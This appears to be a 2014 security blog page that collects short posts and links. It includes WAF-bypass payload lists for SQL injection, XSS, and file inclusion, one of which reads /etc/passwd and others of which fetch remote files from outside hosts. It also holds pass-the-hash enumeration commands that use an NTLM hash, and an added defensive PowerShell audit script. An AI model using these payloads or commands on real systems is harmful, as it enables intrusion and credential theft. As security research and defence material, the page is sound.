CVE Feeds

Jul 31, 2014

Howto: bypass Incapsula and ModSecurity List

SQLi
-  /poc.php?Search2=joxy%27%20group%20by%20testzsl%20having%201=1--

XSS
- /poc.php?x=%3C/h2%3E%3Cinput%20onfocus=prompt%28%27ZSL%27%29;%20autofocus%3E
- /poc.php?x=%3C/h2%3E%3Cbody%20oninput=alert%281%29%3E%3Cinput%20autofocus%3E
- /poc.php?x=%3C/h2%3E%3Cobject%20data=%22data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%22%3E%3C/object%3E

LFI/RFI
- /poc.php?cmd2=http://google.com?
- /poc.php?cmd2=cat%20\/etc/\/passwd
- /poc.php?cmd2=http://dni.destr0y.net/x.txt
- /poc.php?cmd2=http://96.8.122.139/x.php?????????


Source: http://www.intelligentexploit.com/articles/CloudFlare-vs-Incapsula-vs-ModSecurity.pdf

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Fix "Error code: sec_error_untrusted_issuer" in Firefox

When I test an HTTPS website with Burp Suite + Firefox, I get "(Error code: sec_error_untrusted_issuer)" and can't open any page of the target website, so I have to add an exception for this certificate in my Firefox. This is how to do that.
1. Go to your Preferences.
2. Go to the Advanced tab -> Certificates.
3. View Certificates.
4. Click Add Exception.
5. Fill in your target website.
6. Get Certificate -> Confirm Security Exception.
7. OK.
8. Try visiting the website again.

Jul 30, 2014

Pass-the-Hash is Dead: Long Live Pass-the-Hash

Source: http://www.harmj0y.net/blog/penetesting/pass-the-hash-is-dead-long-live-pass-the-hash/  

“Administrators” are no longer able to execute code with WMI or PSEXEC, use schtasks or at, or even browse the open shares on the target machine. the RID 500 built-in Administrator account, even if it’s renamed. While Windows 7 installs will now disable this account by default and prompt for a user to set up another local administrator, many organizations used to standard advice and compliance still have loads of RID 500 accounts, enabled, all over their enterprise.


However, when you try to use PSEXEC or WMIS to trigger agents or commands, or use Impacket's functionality to browse the file shares, you'll encounter something like this:

The "pth-winexe" example above shows the difference between invalid credentials (NT_STATUS_LOGON_FAILURE) and the new patch behavior. If you happen to have the plaintext, through group policy preferences, some Mimikatz luck, or cracking the dumped NTLM hashes, you can still RDP to a target successfully with something like rdesktop -u mike -p password 192.168.52.151.

If we have PowerShell access on a Windows domain machine, you can try enumerating all the local groups on a target machine with something like:
- $computer = [ADSI]"WinNT://WINDOWS2,computer"
- $computer.psbase.children | where { $_.psbase.schemaClassName -eq 'group' } | foreach { ($_.name)[0] }
If we want the members of a specific group, that's not hard either:
- $members = @($([ADSI]"WinNT://WINDOWS2/Administrators").psbase.Invoke("Members"))
- $members | foreach { $_.GetType().InvokeMember("ADspath", 'GetProperty', $null, $_, $null) }
The Nmap scripts smb-enum-groups.nse and smb-enum-users.nse can accomplish the same thing using a valid account for the machine (even a member of local admins!) along with a password or hash:
- nmap -p U:137,T:139 --script-args 'smbuser=mike,smbhash=8846f7eaee8fb117ad06bdd830b7586c' --script=smb-enum-groups --script=smb-enum-users 192.168.52.151
If you want to use a domain account, set your flags to something like --script-args 'smbdomain=DOMAIN,smbuser=USER,smbpass/smbhash=X'. You'll be able to enumerate the RID 500 account name and whether it's disabled, as well as all the members of the local Administrators group on the machine. If there's a returned member of the Administrators group that doesn't show up in the smb-enum-users list, like 'Jason' in this instance, it's likely a domain account. This information can give you a better idea of what credentials will work where, and what systems/accounts you need to target.
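The same ADSI enumeration, turned into a defender-side audit, as an added example that is not part of the quoted post or the original page: it lists the members of a host's local Administrators group, resolves each member's SID to flag the RID 500 built-in account (whatever it has been renamed to) and whether it is enabled, and marks members that come from the domain rather than the local SAM. The $ComputerName parameter and the ADsPath-based local-vs-domain heuristic are assumptions.

```powershell
# Added example, not from the original post: audit a host's local Administrators
# group via the ADSI WinNT provider. Assumes the caller can read the target SAM;
# $ComputerName is a hypothetical parameter that defaults to the local host.
param([string]$ComputerName = $env:COMPUTERNAME)

$group   = [ADSI]"WinNT://$ComputerName/Administrators,group"
$members = @($group.psbase.Invoke("Members"))

$report = foreach ($m in $members) {
    # Each member is a raw COM object; take its ADsPath and rebind it to get a
    # full DirectoryEntry that exposes objectSid and the account flags.
    $path  = $m.GetType().InvokeMember("ADsPath", 'GetProperty', $null, $m, $null)
    $entry = [ADSI]$path

    $sidBytes = [byte[]]$entry.InvokeGet("objectSid")
    $sid = New-Object System.Security.Principal.SecurityIdentifier($sidBytes, 0)
    $rid = [int]($sid.Value.Split('-')[-1])

    # Only user objects carry AccountDisabled; nested groups do not.
    $disabled = $null
    if ($entry.SchemaClassName -eq 'User') {
        $disabled = [bool]$entry.InvokeGet("AccountDisabled")
    }

    # Heuristic (assumption): objects from the local SAM carry the computer name
    # in their ADsPath (WinNT://DOMAIN/COMPUTER/name); domain objects do not.
    $isDomain = $path -notlike "*/$ComputerName/*"

    [pscustomobject]@{
        Member   = ($path -replace '^WinNT://', '')
        Class    = $entry.SchemaClassName
        SID      = $sid.Value
        RID      = $rid
        IsDomain = $isDomain
        Disabled = $disabled
        # RID 500 is the built-in Administrator regardless of its display name;
        # a local, enabled one still authenticates remotely after the patch
        # the post above describes, so it is the finding worth acting on.
        Exposed  = (-not $isDomain) -and ($rid -eq 500) -and ($disabled -eq $false)
    }
}

$report | Format-Table -AutoSize
if ($report | Where-Object Exposed) {
    Write-Warning "Enabled RID 500 local Administrator found on $ComputerName"
}
```

Run it against each host in scope and act on any Exposed row: disable the RID 500 account or, where it must stay, enforce unique local admin passwords so one dumped hash does not open every machine.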

Video: Hack in Paris 2014

Link: https://www.youtube.com/playlist?list=PL3UAg9Zuj1yLmemIKw-domjg5UkbN-pLc


Tools: Wlister - Web application firewall designed to whitelist and/or blacklist HTTP requests.

wlister is a web application firewall (WAF) that protects web applications using whitelisting and attack signatures. The former is used to quickly validate an authorized, well-formed request; the latter is used to detect known attack patterns in HTTP requests.
Using wlister it is possible to apply both methods and to combine them at will.
wlister lets you describe the interactions between the web application and the client, using each piece of an HTTP request and their combinations as potential validation points (URI, parameters, headers, content, method, protocol, ...).

Source: https://github.com/etombini/wlister


Video: Recon 2014

Link: http://recon.cx/2014/video/


CheatSheet: SQL Join

Jul 29, 2014

Tools: WAPMap - Convert .netxml files output by Kismet to Google Map Engine

Usage: ./wap_mapper.py <Kismet.netxml File> <Mode> <Output File Name>
Example: ./wap_mapper.py /root/Kismet-20140725-22-33-53-1.netxml -wep wep_networks.csv
The example parses the provided .netxml file and outputs a CSV file of WEP networks for upload to Google Maps Engine.

Source:
http://www.shortbus.ninja/wardriving-with-kismet-and-wapmap/
https://github.com/hack1thu7ch/WAPMap

CheatSheet: SQLMap from Packetstorm

Source: http://packetstorm.foofus.com/papers/cheatsheets/sqlmap-cheatsheet-1.0-SDB.pdf

Jul 28, 2014

Article: An analysis of Instagram (from 2012)

Link: https://db.tt/RJgoVhEJ